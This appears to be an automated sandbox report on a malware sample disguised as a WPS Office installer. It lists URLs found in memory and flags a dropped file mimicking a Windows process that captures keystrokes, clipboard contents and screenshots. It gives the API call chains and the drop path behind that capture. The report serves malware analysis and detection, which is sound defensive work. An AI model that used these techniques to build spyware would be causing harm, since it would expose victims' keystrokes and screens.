Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000010.00000002.2527730762.0000000002A97000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2528351985.00000000028CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000011.00000002.2548437777.0000000006F6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi#
Source: powershell.exe, 00000011.00000002.2548437777.0000000006F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro#:
Source: powershell.exe, 00000011.00000002.2549179185.0000000006FAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microf?
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://dw-collect-debug.ksord.com)datesign_eventslocal
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://dw-online.ksosoft.com/api/dynamicParam/v3/app/2.9.0dcsdk_eventv3.dbdcsdk_dpv3.data10C
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://en.ksupdate.com/errorreport/uphttps://en.ksupdate.com/errorreport/up-crashdmp
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://event.4wps.nethttps://event.wps.comcountryCodeFinishTaghttps://www.google-analytics.com/mp/co
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: http://ic.wps.cn/wpsv6internet/infos.ads?v=D1S1E1&d=kdcsdk_infoc/wps/client/appcountrycodelastupdate
Source: powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.comodoca.com0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0A
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0C
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0L
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0N
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://ocsp.digicert.com0X
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.sectigo.com0
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: http://ocsp.sectigo.com0#
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000010.00000002.2528737566.0000000004FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2528737566.0000000004935000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1703674641.0000000000640000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1704068985.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.dr, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: powershell.exe, 00000010.00000002.2528737566.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2531697762.0000000004701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://clients2.google.com/service/update2/crxSoftware
Source: powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://curl.se/docs/hsts.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://event.wps.comdynamicParamFinishTagt1_app_start_p_st_sv_app_gid_did_hdid3_aid_ut_rid_av_ch_db
Source: powershell.exe, 00000011.00000002.2531697762.0000000004856000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://http_.index.inicert_detailis_cached_fileverify_cert_failedKOnlineSetupImpl::__generateCacheF
Source: powershell.exe, 00000010.00000002.2543413413.0000000005842000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2542095102.0000000005762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://params.wps.com/api/map/online_params/webparam_mig/onlineParamByFunc?funcName=&version=&chann
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://s.wps.comshortLinkUrlshortlink/short-link/queryshort_link_code=geterr_signAuthorizationdevic
Source: S1Rv3ioghk.exe, yyzyBase.dll.0.dr, backup.dll.3.drString found in binary or memory: https://sectigo.com/CPS0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/onlinesetup/distsrc/.execrashdmppidtidexp1IS_WPSO
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://wdl1.pcfg.cache.wpscdn.com/wpsdl/wpsoffice/onlinesetup/package/SOFTWARE
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://website-prod.cache.wpscdn.com/pkgs/win/setup_XA_mui_Free.exeSOFTWARE
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002B8E000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe, 00000003.00000003.2415021748.000000000074A000.00000004.00000020.00020000.00000000.sdmp, ShellExperienceHosts.exe.0.dr, backup.exe.3.drString found in binary or memory: https://www.digicert.com/CPS0
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.google-analytics.com/mp/collecthttps://http:///Iphlpapi.dllGetNetworkParamsinternal_proc
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/eula
Source: S1Rv3ioghk.exe, 00000000.00000003.1701410511.0000000002F1A000.00000004.00000020.00020000.00000000.sdmp, wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/eulaprivacy_policylicense_agreementlabelTitleMsg_Wps_OnlineSetup_TaskMsgMsg_Wps_
Source: wps_lid.lid-s8HDMqE8a6Xy.exe.0.drString found in binary or memory: https://www.wps.com/privacy-policy

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Contains functionality to capture and log keystrokes
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: [esc]3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: [esc]3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: [esc]3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: [esc]3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332E850 Sleep,CreateMutexW,GetLastError,_memset,Sleep,GetTickCount,GetTickCount,GetTickCount,InterlockedExchange,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,wsprintfW,_memset,GlobalUnlock,CloseClipboard,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,GetKeyState,lstrlenW,wsprintfW,lstrlenW,lstrlenW,wsprintfW,wsprintfW,wsprintfW,lstrlenW,WaitForSingleObject,CreateFileW,SetFilePointer,lstrlenW,WriteFile,CloseHandle,ReleaseMutex,3_2_0332E850
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332BC70 GetDesktopWindow,GetDC,GetDC,CreateCompatibleDC,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CreateCompatibleBitmap,SelectObject,SetStretchBltMode,GetSystemMetrics,GetSystemMetrics,StretchBlt,_memset,GetDIBits,_memset,DeleteObject,DeleteObject,ReleaseDC,DeleteObject,DeleteObject,ReleaseDC,3_2_0332BC70
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F4DAC GetSystemMetrics,GetAsyncKeyState,WindowFromPoint,ScreenToClient,SendMessageW,ScreenToClient,3_2_6C6F4DAC
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332E4F0 Sleep,CreateMutexW,GetLastError,SHGetFolderPathW,lstrcatW,CreateMutexW,WaitForSingleObject,CreateFileW,GetFileSize,CloseHandle,DeleteFileW,ReleaseMutex,DirectInput8Create,GetTickCount,GetKeyState,3_2_0332E4F0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C74C3CF GetKeyState,GetKeyState,GetKeyState,3_2_6C74C3CF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B8E2D CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,CryptDestroyKey,CryptReleaseContext,___std_exception_copy,___std_exception_copy,3_2_6C6B8E2D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B43F ExitWindowsEx,3_2_0332B43F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B41B ExitWindowsEx,3_2_0332B41B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0332B463 ExitWindowsEx,3_2_0332B463
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326EE03_2_03326EE0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_03326C503_2_03326C50
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333E3413_2_0333E341
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033383813_2_03338381
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333EA1D3_2_0333EA1D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033289003_2_03328900
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333F9FF3_2_0333F9FF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333D89F3_2_0333D89F
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_0333DDF03_2_0333DDF0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_033224B03_2_033224B0
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B8E2D3_2_6C6B8E2D
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6DA6CF3_2_6C6DA6CF
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6B87923_2_6C6B8792
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BA1AE3_2_6C6BA1AE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6D9B7B3_2_6C6D9B7B
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6DB6543_2_6C6DB654
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BAD113_2_6C6BAD11
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BAE953_2_6C6BAE95
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C84CF403_2_6C84CF40
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C71483C3_2_6C71483C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6CC9CA3_2_6C6CC9CA
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C699E3_2_6C6C699E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C854B743_2_6C854B74
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6F854C3_2_6C6F854C
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C71250E3_2_6C71250E
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7107B93_2_6C7107B9
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BA1EE3_2_6C6BA1EE
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C7A01E53_2_6C7A01E5
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6BA2653_2_6C6BA265
Source: C:\Users\Public\Bulete\program\ShellExperienceHosts.exeCode function: 3_2_6C6C622C3_2_6C6C622C
